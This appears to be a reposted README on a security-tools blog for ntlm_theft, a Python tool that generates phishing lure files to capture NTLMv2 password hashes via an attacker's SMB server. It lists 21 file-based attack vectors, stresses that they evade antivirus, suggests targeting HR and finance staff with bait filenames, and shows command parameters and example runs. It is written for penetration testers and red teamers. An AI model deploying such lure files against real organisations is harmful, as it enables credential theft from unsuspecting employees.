<a href="http://2.bp.blogspot.com/-Lc-pMQxsfVg/YTVKVhCUJqI/AAAAAAAAt1I/Hsik9IJaHQENyEWH7b1bKIx-2vjj3ttNwCK4BGAYYCw/s1600/ntlm_theft_1_example-run-781145.png" style="text-align: center;"><img alt="" border="0" height="336" id="BLOGGER_PHOTO_ID_7004586528950462114" src="http://2.bp.blogspot.com/-Lc-pMQxsfVg/YTVKVhCUJqI/AAAAAAAAt1I/Hsik9IJaHQENyEWH7b1bKIx-2vjj3ttNwCK4BGAYYCw/w640-h336/ntlm_theft_1_example-run-781145.png" width="640" /></a> A tool for generating multiple types of NTLMv2 hash theft files. ntlm_theft is an Open Source Python3 Tool that generates 21 different types of hash theft documents. These can be used for phishing when either the target allows smb traffic outside their network, or if you are already inside the internal network. The benefits of these file types over say macro based documents or exploit documents are that all of these are built using "intended functionality". None were flagged by <a href="https://www.kitploit.com/search/label/Windows%20Defender" target="_blank" title="Windows Defender">Windows Defender</a> Antivirus on June 2020, and 17 of the 21 attacks worked on a fully patched Windows 10 host.<a name='more'></a> ntlm_theft supports the following attack types: <ul> <li>Browse to Folder Containing <ul> <li>.url – via URL field</li> <li>.url – via ICONFILE field</li> <li>.lnk - via icon_location field</li> <li>.scf – via ICONFILE field (Not Working on Latest Windows)</li> <li>autorun.inf via OPEN field (Not Working on Latest Windows)</li> <li>desktop.ini - via IconResource field (Not Working on Latest Windows)</li> </ul> </li> <li>Open Document <ul> <li>.xml – via Microsoft Word external stylesheet</li> <li>.xml – via Microsoft Word includepicture field</li> <li>.htm – via Chrome &amp; IE &amp; Edge img src (only if opened locally, not hosted)</li> <li>.docx – via Microsoft Word includepicture field</li> <li>.docx – via Microsoft Word external template</li> <li>.docx – via Microsoft Word frameset webSettings</li> <li>.xlsx - via Microsoft Excel external cell</li> <li>.wax - via Windows Media Player playlist (Better, primary open)</li> <li>.asx – via Windows Media Player playlist (Better, primary open)</li> <li>.m3u – via Windows Media Player playlist (Worse, Win10 opens first in Groovy)</li> <li>.jnlp – via Java external jar</li> <li>.application – via any Browser (Must be served via a browser downloaded or won’t run)</li> </ul> </li> <li>Open Document and Accept Popup <ul> <li>.pdf – via Adobe Acrobat Reader</li> </ul> </li> <li>Click Link in Chat Program <ul> <li>.txt – formatted link to paste into Zoom chat</li> </ul> </li> </ul> Usecases (Why you want to run this) ntlm_theft is primarily aimed at Penetration Testers and Red Teamers, who will use it to perform internal phishing on target company employees, or to mass test antivirus and email gateways. It may also be used for external phishing if outbound SMB access is allowed on the perimeter firewall. I've found it useful while <a href="https://www.kitploit.com/search/label/Penetration%20Testing" target="_blank" title="penetration testing">penetration testing</a> to easily see what file types I have available to me, rather than spending time configuring a specific attack as would be used on <a href="https://www.kitploit.com/search/label/Red%20Teaming" target="_blank" title="red teaming">red teaming</a> engagements. You could send a .rtf or .docx file to the HR department, and a .xlsx spreadsheet doc to the finance department. Getting Started These instructions will show you the <a href="https://www.kitploit.com/search/label/Requirements" target="_blank" title="requirements">requirements</a> for and how to use ntlm_theft. Prerequisites ntlm_theft requires Python3 and xlsxwriter: <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="pip3 install xlsxwriter "><pre><code>pip3 install xlsxwriter </code></pre></div> Required Parameters To start up the tool 4 parameters must be provided, an input format, the input file or folder and the basic running mode: <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="-g, --generate	: Choose to generate all files or a specific filetype -s, --server 	: The IP address of your SMB hash capture server (Responder, impacket ntlmrelayx, Metasploit auxiliary/server/capture/smb, etc) -f, --filename	: The base filename without extension, can be renamed later (eg: test, Board-Meeting2020, Bonus_Payment_Q4) "><pre><code>-g, --generate	: Choose to generate all files or a specific filetype -s, --server 	: The IP address of your SMB hash capture server (Responder, impacket ntlmrelayx, Metasploit auxiliary/server/capture/smb, etc) -f, --filename	: The base filename without extension, can be renamed later (eg: test, Board-Meeting2020, Bonus_Payment_Q4) </code></pre></div> Example Runs Here is an example of what a run looks like generating all files: <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="# python3 ntlm_theft.py -g all -s 127.0.0.1 -f test Created: test/test.scf (BROWSE) Created: test/test-(url).url (BROWSE) Created: test/test-(icon).url (BROWSE) Created: test/test.rtf (OPEN) Created: test/test-(stylesheet).xml (OPEN) Created: test/test-(fulldocx).xml (OPEN) Created: test/test.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE) Created: test/test-(includepicture).docx (OPEN) Created: test/test-(remotetemplate).docx (OPEN) Created: test/test-(frameset).docx (OPEN) Created: test/test.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY) Created: test/test.asx (OPEN) Created: test/test.jnlp (OPEN) Created: test/test.application (DOWNLOAD AND OPEN) Created: test/test.pdf (OPEN AND ALLOW) Created: test/zoom-attack-instructions.txt (PASTE TO CHAT) Generation Complete. "><pre><code># python3 ntlm_theft.py -g all -s 127.0.0.1 -f test Created: test/test.scf (BROWSE) Created: test/test-(url).url (BROWSE) Created: test/test-(icon).url (BROWSE) Created: test/test.rtf (OPEN) Created: test/test-(stylesheet).xml (OPEN) Created: test/test-(fulldocx).xml (OPEN) Created: test/test.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE) Created: test/test-(includepicture).docx (OPEN) Created: test/test-(remotetemplate).docx (OPEN) Created: test/test-(frameset).docx (OPEN) Created: test/test.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY) Created: test/test.asx (OPEN) Created: test/test.jnlp (OPEN) Created: test/test.application (DOWNLOAD AND OPEN) Created: test/test.pdf (OPEN AND ALLOW) Created: test/zoom-attack-instructions.txt (PASTE TO CHAT) Generation Complete. </code></pre></div> <a href="https://github.com/Greenwolf/ntlm_theft/blob/master/docs/example-run.png?raw=true" rel="nofollow" target="_blank" title="A tool for generating multiple types of NTLMv2 hash theft files by Jacob Wilkin (Greenwolf) (5)"></a><a href="http://2.bp.blogspot.com/-Lc-pMQxsfVg/YTVKVhCUJqI/AAAAAAAAt1I/Hsik9IJaHQENyEWH7b1bKIx-2vjj3ttNwCK4BGAYYCw/s1600/ntlm_theft_1_example-run-781145.png"><img alt="" border="0" height="336" id="BLOGGER_PHOTO_ID_7004586528950462114" src="http://2.bp.blogspot.com/-Lc-pMQxsfVg/YTVKVhCUJqI/AAAAAAAAt1I/Hsik9IJaHQENyEWH7b1bKIx-2vjj3ttNwCK4BGAYYCw/w640-h336/ntlm_theft_1_example-run-781145.png" width="640" /></a> Here is an example of what a run looks like generating only modern files: <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="# python3 ntlm_theft.py -g modern -s 127.0.0.1 -f meeting Skipping SCF as it does not work on modern Windows Created: meeting/meeting-(url).url (BROWSE TO FOLDER) Created: meeting/meeting-(icon).url (BROWSE TO FOLDER) Created: meeting/meeting.rtf (OPEN) Created: meeting/meeting-(stylesheet).xml (OPEN) Created: meeting/meeting-(fulldocx).xml (OPEN) Created: meeting/meeting.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE) Created: meeting/meeting-(includepicture).docx (OPEN) Created: meeting/meeting-(remotetemplate).docx (OPEN) Created: meeting/meeting-(frameset).docx (OPEN) Created: meeting/meeting-(externalcell).xlsx (OPEN) Created: meeting/meeting.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY) Created: meeting/meeting.asx (OPEN) Created: meeting/meeting.jnlp (OPEN) Created: meeting/meeting.application (DOWNLOAD AND OPEN) Created: meeting/meeting.pdf (OPEN AND ALLOW) Skipping zoom as it does not work on the latest versions Skipping Autorun.inf as it does not work on modern Windows Skipping desktop.ini as it does not work on modern Windows Generation Complete. "><pre><code># python3 ntlm_theft.py -g modern -s 127.0.0.1 -f meeting Skipping SCF as it does not work on modern Windows Created: meeting/meeting-(url).url (BROWSE TO FOLDER) Created: meeting/meeting-(icon).url (BROWSE TO FOLDER) Created: meeting/meeting.rtf (OPEN) Created: meeting/meeting-(stylesheet).xml (OPEN) Created: meeting/meeting-(fulldocx).xml (OPEN) Created: meeting/meeting.htm (OPEN FROM DESKTOP WITH CHROME, IE OR EDGE) Created: meeting/meeting-(includepicture).docx (OPEN) Created: meeting/meeting-(remotetemplate).docx (OPEN) Created: meeting/meeting-(frameset).docx (OPEN) Created: meeting/meeting-(externalcell).xlsx (OPEN) Created: meeting/meeting.m3u (OPEN IN WINDOWS MEDIA PLAYER ONLY) Created: meeting/meeting.asx (OPEN) Created: meeting/meeting.jnlp (OPEN) Created: meeting/meeting.application (DOWNLOAD AND OPEN) Created: meeting/meeting.pdf (OPEN AND ALLOW) Skipping zoom as it does not work on the late st versions Skipping Autorun.inf as it does not work on modern Windows Skipping desktop.ini as it does not work on modern Windows Generation Complete. </code></pre></div> Here is an example of what a run looks like generating only a xlsx file: <div class="snippet-clipboard-content position-relative" data-snippet-clipboard-copy-content="# python3 ntlm_theft.py -g xlsx -s 192.168.1.103 -f Bonus_Payment_Q4 Created: Bonus_Payment_Q4/Bonus_Payment_Q4-(externalcell).xlsx (OPEN) Generation Complete. "><pre><code># python3 ntlm_theft.py -g xlsx -s 192.168.1.103 -f Bonus_Payment_Q4 Created: Bonus_Payment_Q4/Bonus_Payment_Q4-(externalcell).xlsx (OPEN) Generation Complete. </code></pre></div> Authors <ul> <li>Jacob Wilkin - Research and Development</li> </ul> License ntlm_theft Created by Jacob Wilkin Copyright (C) 2020 Jacob Wilkin This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is <a href="https://www.kitploit.com/search/label/Distributed" target="_blank" title="distributed">distributed</a> in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. Acknowledgments <ul> <li><a href="https://ired.team/offensive-security/initial-access/t1187-forced-authentication" rel="nofollow" target="_blank" title="Ired">Ired</a></li> <li><a href="https://www.securify.nl/blog/SFY20180501/living-off-the-land_-stealing-netntlm-hashes.html" rel="nofollow" target="_blank" title="Securify">Securify</a></li> <li><a href="https://pentestlab.blog/2017/12/18/microsoft-office-ntlm-hashes-via-frameset/" rel="nofollow" target="_blank" title="Pentestlab">Pentestlab</a></li> <li><a href="https://github.com/deepzec/Bad-Pdf/blob/master/badpdf.py" rel="nofollow" target="_blank" title="deepzec">deepzec</a></li> <li><a href="https://github.com/rocketscientist911/excel-ntlmv2" rel="nofollow" target="_blank" title="rocketscientist911">rocketscientist911</a></li> <li><a href="https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/" rel="nofollow" target="_blank" title="Osanda">Osanda</a></li> <li><a href="https://www.youtube.com/watch?v=PDpBEY1roRc" rel="nofollow" target="_blank" title="Violation Industry">Violation Industry</a></li> <li><a href="https://github.com/kazkansouh" rel="nofollow" target="_blank" title="@kazkansouh">@kazkansouh</a> - Adding .lnk support</li> </ul> <div style="text-align: center;"><a class="kiploit-download" href="https://github.com/Greenwolf/ntlm_theft" rel="nofollow" target="_blank" title="Download Ntlm_Theft">Download Ntlm_Theft</a></div>

Tag

#Ntlm_Theft